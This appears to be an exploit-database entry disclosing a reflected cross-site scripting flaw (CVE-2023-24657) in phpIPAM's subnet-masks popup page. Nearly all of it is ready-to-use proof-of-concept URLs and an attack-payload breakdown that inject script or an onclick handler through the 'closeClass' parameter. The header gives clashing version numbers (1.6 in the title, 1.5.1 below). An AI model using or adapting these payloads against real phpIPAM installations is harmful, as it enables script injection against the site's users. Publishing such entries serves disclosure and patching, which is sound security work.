# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu Windows
# CVE : CVE-2023-24657
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22


    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"



[Replace Your Domain Name]